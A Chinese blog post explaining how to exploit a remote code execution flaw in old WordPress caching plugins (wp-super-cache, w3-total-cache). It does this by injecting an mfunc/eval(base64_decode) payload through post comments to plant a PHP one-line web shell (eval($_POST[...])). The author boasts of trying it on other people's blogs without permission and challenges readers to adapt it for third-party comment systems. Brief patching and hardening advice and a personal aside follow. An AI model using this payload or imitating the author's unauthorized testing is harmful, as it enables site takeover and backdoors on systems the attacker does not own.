wordpress缓存插件远程代码执行漏洞的利用

wp-super-cache 1.3以下版本,w3-total-cache 0.9.2.9以下版本均存在此漏洞.

漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评论中,当缓存更新后,就可实现插入后门等行为。

举例

<!--mfunc eval(base64_decode(redacted, see a trend here)); --><!--/mfunc-->
/*base64加密的诸如*/eval($_POST["lu"]);/*一句话后门可在这里被执行*/
/*后门地址为:http://blog/wp-content/redacted*/

我把用了这两款插件的诸位都测试了一下,发现绝大多数博主都有着更新插件的好习惯。特地试验了几个坏人的,这下我终于有办法治你们了哇哈哈。

解决方案

这漏洞在公布前就被玩过一段时间了,所以你是不是在睡梦中就被人家搞了我也不知道。

最简单的解决方法是升级到两款插件的最新版本。

未雨绸缪

wordpress优秀的扩展性能导致了在对wp进行入侵时大多都会在插件上找到突破口。我们无法预料到哪款插件会出现0day。

如果非要使用wordpress,应尽量少的使用插件,并尽量隐藏插件的特征。例如修改插件代码,去掉其在页面中的注释。使用重写规则隐藏掉插件的目录。

提问

如果目标网站使用了多说等社会化评论插件,该如何利用此漏洞呢?考思路的,第一个答对的也没奖励。

……


那天早晨在火车上穿白丝秋裤得瑟,赶上降温。导致感冒了三天,发烧不退。今天查了一下禽流感的症状,结论是如果是禽流感的话,我应该早就挂了。目前病情有所缓解,但依然可以接受诸位的慰问及礼物。

TAG:
下一篇: 上一篇:

本站文章,如非注明,皆为原创。采用 《知识共享署名-非商业性使用-相同方式共享 3.0》许可协议进行许可。转载需注明本文链接并保证链接可用。本站法律顾问:龚婉容律师

Back to top
逗妇鲁公众号
逗妇鲁公众号